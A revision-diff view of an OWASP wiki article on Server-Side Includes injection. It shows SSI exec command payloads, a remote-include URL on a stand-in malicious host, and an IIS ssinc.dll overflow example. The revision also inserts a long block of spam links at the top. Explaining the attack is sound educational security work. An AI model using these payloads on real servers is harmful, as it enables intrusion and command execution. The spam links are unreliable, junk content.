Difference between revisions of "Server-Side Includes (SSI) Injection"

From OWASP
Jump to: navigation, search
Line 1: Line 1:
 +
[http://s1.shard.jp/frhorton/9nls8flts.html aids facts africa] [http://s1.shard.jp/bireba/antivirus-mcafee.html mcaffee antivirus updates ] [http://s1.shard.jp/olharder/xp-logs-off-automatically.html reiter automotive north america ] [http://s1.shard.jp/galeach/new83.html anastasia left outside alone mp3 ] [http://s1.shard.jp/frhorton/mgsbz3g84.html african american man young ] [http://s1.shard.jp/bireba/vexira-antivirus.html symantec antivirus corporate ] [http://s1.shard.jp/losaul/australia-physiotherapy.html mdbsaustralia.com ] [http://s1.shard.jp/olharder/value-of-groucho.html automotive acrylic paint ] [http://s1.shard.jp/bireba/avg-free-antivirus.html antivirus online scan free ] [http://s1.shard.jp/frhorton/lywbi2iaz.html south african football association ] [http://s1.shard.jp/olharder/autoroll-654.html webmap] [http://s1.shard.jp/bireba/antivirus-appliance.html etrust antivirus free downloads ] [http://s1.shard.jp/olharder/auto-buy-com.html auto buy .com] [http://s1.shard.jp/olharder/ automotive hand vacuum pump ] [http://s1.shard.jp/bireba/2005-antivirus.html ad ware antivirus ] [http://s1.shard.jp/olharder/auto-benz-dealer.html download autodesk architectural desktop ] [http://s1.shard.jp/olharder/autoroll-654.html map] [http://s1.shard.jp/olharder/morrey-auto-group.html portable auto gps ] [http://s1.shard.jp/galeach/new58.html asian markets ] [http://s1.shard.jp/losaul/australia-immigration.html panasonic australia ] [http://s1.shard.jp/galeach/new7.html asian earth quake ] [http://s1.shard.jp/olharder/autores-romanticos.html autoftp crack ] [http://s1.shard.jp/bireba/macintosh-antivirus.html antivirusdisable notify ] [http://s1.shard.jp/losaul/australia-uranium.html blank map of australia ] [http://s1.shard.jp/olharder/collective-unconscious.html collective unconscious autonomic nervous system] [http://s1.shard.jp/frhorton/u91w9mfua.html click language african ] [http://s1.shard.jp/losaul/ozone-therapy-australia.html jeans west australia ] [http://s1.shard.jp/olharder/rockies-auto-colorado.html cotalings auto body ] [http://s1.shard.jp/losaul/informed-sources.html australia drop letterbox ] [http://s1.shard.jp/galeach/new1.html asia footage in tsunami video ] [http://s1.shard.jp/olharder/prestige-auto.html midway auto sales ] [http://s1.shard.jp/bireba/guard-antivirus.html symantech antivirus updates ] [http://s1.shard.jp/olharder/anderson-autopsy.html automobile lemon check ] [http://s1.shard.jp/olharder/autoroll-654.html url] [http://s1.shard.jp/losaul/australia-posters.html bath bomb australia ] [http://s1.shard.jp/frhorton/xodsctsq6.html african brides.com ] [http://s1.shard.jp/galeach/new125.html airline asiana philippine ] [http://s1.shard.jp/galeach/new176.html asia globalization ] [http://s1.shard.jp/frhorton/kqcuriisf.html african and modern art ] [http://s1.shard.jp/galeach/new135.html asian market stock ] [http://s1.shard.jp/frhorton/atm6jbmgn.html african dreams guest house] [http://s1.shard.jp/losaul/new-england-university.html model boats australia ] [http://s1.shard.jp/olharder/long-term-auto.html 3 auto grand ps2 theft through walk ] [http://s1.shard.jp/bireba/microworld-antivirus.html antivirus mcafee download ] [http://s1.shard.jp/losaul/real-estate-western.html domaine furniture australia ] [http://s1.shard.jp/bireba/antivirus-trials.html stinger antivirus tools ] [http://s1.shard.jp/frhorton/ south african appetizer ] [http://s1.shard.jp/frhorton/2tqspott4.html african american funeral programs] [http://s1.shard.jp/bireba/eztrust-antivirus.html eztrust antivirus free download] 
 
http://www.textalgetvizel.com  
 
http://www.textalgetvizel.com  
 
{{Template:Attack}}
 
{{Template:Attack}}
Line 73: Line 74:
 
  <nowiki><!--#echo var="DOCUMENT_URI" --></nowiki>
 
  <nowiki><!--#echo var="DOCUMENT_URI" --></nowiki>
  
Using the “config” command and “timefmt” parameter, it is possible to control the date and time output format:
+
Using the “config” command and “timefmt” parameter, it is possible to control the date and time output format:
 
   
 
   
 
  <nowiki><!--#config timefmt="A %B %d %Y %r"--></nowiki>
 
  <nowiki><!--#config timefmt="A %B %d %Y %r"--></nowiki>
  
Using the “fsize” command, it is possible to print the size of selected file:
+
Using the “fsize” command, it is possible to print the size of selected file:
 
   
 
   
 
  <nowiki><!--#fsize file="ssi.shtml" --></nowiki>
 
  <nowiki><!--#fsize file="ssi.shtml" --></nowiki>
Line 83: Line 84:
 
===Example 3===
 
===Example 3===
  
An old vulnerability in the IIS versions 4.0 and 5.0 allows an attacker to obtain system privileges through a buffer overflow failure in a dynamic link library (ssinc.dll). The “ssinc.dll” is used to interpreter process Server-Side Includes.  
+
An old vulnerability in the IIS versions 4.0 and 5.0 allows an attacker to obtain system privileges through a buffer overflow failure in a dynamic link library (ssinc.dll). The “ssinc.dll” is used to interpreter process Server-Side Includes.  
 
[http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2001-0506 CVE 2001-0506].
 
[http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2001-0506 CVE 2001-0506].
  
By creating a malicious page containing the SSI code bellow and forcing the application to load this page ([[Path Traversal]] attack), it’s possible to perform this attack:  
+
By creating a malicious page containing the SSI code bellow and forcing the application to load this page ([[Path Traversal]] attack), it’s possible to perform this attack:  
  
 
ssi_over.shtml
 
ssi_over.shtml
  
  <nowiki><!--#include file=”UUUUUUUU...UU”--></nowiki>
+
  <nowiki><!--#include file=”UUUUUUUU...UU”--></nowiki>
  
PS: The number of “U” needs to be longer than 2049.
+
PS: The number of “U” needs to be longer than 2049.
 
   
 
   
 
Forcing application to load the ssi_over.shtml page:
 
Forcing application to load the ssi_over.shtml page:

Revision as of 07:11, 26 May 2009

aids facts africa [http://s1.shard.jp/bireba/antivirus-mcafee.html mcaffee antivirus updates ] [http://s1.shard.jp/olharder/xp-logs-off-automatically.html reiter automotive north america ] [http://s1.shard.jp/galeach/new83.html anastasia left outside alone mp3 ] [http://s1.shard.jp/frhorton/mgsbz3g84.html african american man young ] [http://s1.shard.jp/bireba/vexira-antivirus.html symantec antivirus corporate ] [http://s1.shard.jp/losaul/australia-physiotherapy.html mdbsaustralia.com ] [http://s1.shard.jp/olharder/value-of-groucho.html automotive acrylic paint ] [http://s1.shard.jp/bireba/avg-free-antivirus.html antivirus online scan free ] [http://s1.shard.jp/frhorton/lywbi2iaz.html south african football association ] webmap [http://s1.shard.jp/bireba/antivirus-appliance.html etrust antivirus free downloads ] auto buy .com [http://s1.shard.jp/olharder/ automotive hand vacuum pump ] [http://s1.shard.jp/bireba/2005-antivirus.html ad ware antivirus ] [http://s1.shard.jp/olharder/auto-benz-dealer.html download autodesk architectural desktop ] map [http://s1.shard.jp/olharder/morrey-auto-group.html portable auto gps ] [http://s1.shard.jp/galeach/new58.html asian markets ] [http://s1.shard.jp/losaul/australia-immigration.html panasonic australia ] [http://s1.shard.jp/galeach/new7.html asian earth quake ] [http://s1.shard.jp/olharder/autores-romanticos.html autoftp crack ] [http://s1.shard.jp/bireba/macintosh-antivirus.html antivirusdisable notify ] [http://s1.shard.jp/losaul/australia-uranium.html blank map of australia ] collective unconscious autonomic nervous system [http://s1.shard.jp/frhorton/u91w9mfua.html click language african ] [http://s1.shard.jp/losaul/ozone-therapy-australia.html jeans west australia ] [http://s1.shard.jp/olharder/rockies-auto-colorado.html cotalings auto body ] [http://s1.shard.jp/losaul/informed-sources.html australia drop letterbox ] [http://s1.shard.jp/galeach/new1.html asia footage in tsunami video ] [http://s1.shard.jp/olharder/prestige-auto.html midway auto sales ] [http://s1.shard.jp/bireba/guard-antivirus.html symantech antivirus updates ] [http://s1.shard.jp/olharder/anderson-autopsy.html automobile lemon check ] url [http://s1.shard.jp/losaul/australia-posters.html bath bomb australia ] [http://s1.shard.jp/frhorton/xodsctsq6.html african brides.com ] [http://s1.shard.jp/galeach/new125.html airline asiana philippine ] [http://s1.shard.jp/galeach/new176.html asia globalization ] [http://s1.shard.jp/frhorton/kqcuriisf.html african and modern art ] [http://s1.shard.jp/galeach/new135.html asian market stock ] african dreams guest house [http://s1.shard.jp/losaul/new-england-university.html model boats australia ] [http://s1.shard.jp/olharder/long-term-auto.html 3 auto grand ps2 theft through walk ] [http://s1.shard.jp/bireba/microworld-antivirus.html antivirus mcafee download ] [http://s1.shard.jp/losaul/real-estate-western.html domaine furniture australia ] [http://s1.shard.jp/bireba/antivirus-trials.html stinger antivirus tools ] [http://s1.shard.jp/frhorton/ south african appetizer ] african american funeral programs eztrust antivirus free download http://www.textalgetvizel.com

This is an Attack. To view all attacks, please see the Attack Category page.




Last revision (mm/dd/yy): 05/26/2009


Description

SSIs are directives present on Web applications used to feed an HTML page with dynamic contents. They are similar to CGIs, except that SSIs are used to execute some actions before the current page is loaded or while the page is being visualized. In order to do so, the web server analyzes SSI before supplying the page to the user.

The Server-Side Includes attack allows the exploitation of a web application by injecting scripts in HTML pages or executing arbitrary codes remotely. It can be exploited through manipulation of SSI in use in the application or force its use through user input fields.

It is possible to check if the application is properly validating input fields data by inserting characters that are used in SSI directives, like:

< ! # = / . " - > and [a-zA-Z0-9] 

Another way to discover if the application is vulnerable is to verify the presence of pages with extension .stm, .shtm and .shtml. However, the lack of these type of pages does not mean that the application is protected against SSI attacks.

In any case, the attack will be successful only if the web server permits SSI execution without proper validation. This can lead to access and manipulation of file system and process under the permission of the web server process owner.

The attacker can access sensitive information, such as password files, and execute shell commands. The SSI directives are injected in input fields and they are sent to the web server. The web server parses and executes the directives before supplying the page. Then, the attack result will be viewable the next time that the page is loaded for the user's browser.

Risk Factors

TBD

Examples

Example 1

The commands used to inject SSI vary according to the server operational system in use. The following commands represent the syntax that should be used to execute OS commands.

Linux:

List files of directory:

< !--#exec cmd="ls" -->

Access directories:


Windows:

List files of directory:

< !--#exec cmd="dir" -->

Access directories:

< !--#exec cmd="cd C:\admin\dir">

Example 2

Other SSI examples that can be used to access and set server information:

To change the error message output:

<!--#config errmsg="File not found, informs users and password"-->

To show current document filename:

<!--#echo var="DOCUMENT_NAME" -->

To show virtual path and filename:

<!--#echo var="DOCUMENT_URI" -->

Using the “config” command and “timefmt” parameter, it is possible to control the date and time output format:

<!--#config timefmt="A %B %d %Y %r"-->

Using the “fsize” command, it is possible to print the size of selected file:

<!--#fsize file="ssi.shtml" -->

Example 3

An old vulnerability in the IIS versions 4.0 and 5.0 allows an attacker to obtain system privileges through a buffer overflow failure in a dynamic link library (ssinc.dll). The “ssinc.dll” is used to interpreter process Server-Side Includes. CVE 2001-0506.

By creating a malicious page containing the SSI code bellow and forcing the application to load this page (Path Traversal attack), it’s possible to perform this attack:

ssi_over.shtml

<!--#include file=”UUUUUUUU...UU”-->

PS: The number of “U” needs to be longer than 2049.

Forcing application to load the ssi_over.shtml page:

Non-malicious URL:

www.vulnerablesite.org/index.asp?page=news.asp

Malicious URL:

www.vulnerablesite.org/index.asp?page=www.malicioussite.com/ssi_over.shtml

If the IIS return a blank page it indicates that an overflow has occurred. In this case, the attacker might manipulate the procedure flow and executes arbitrary code.

Related Threat Agents

Related Attacks

Related Vulnerabilities

Related Controls

References